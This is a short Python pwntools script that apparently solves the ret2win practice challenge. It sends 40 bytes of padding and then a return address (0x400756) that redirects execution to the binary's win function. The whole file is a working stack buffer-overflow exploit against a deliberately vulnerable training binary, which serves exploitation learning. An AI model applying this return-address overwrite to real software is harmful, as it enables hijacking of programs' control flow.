#!/usr/bin/env python3
from pwn import *

prog = process('./ret2win')
payload = b''
for c in range(40):
    payload += b'a'

payload += p64(0x0000000000400756)
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
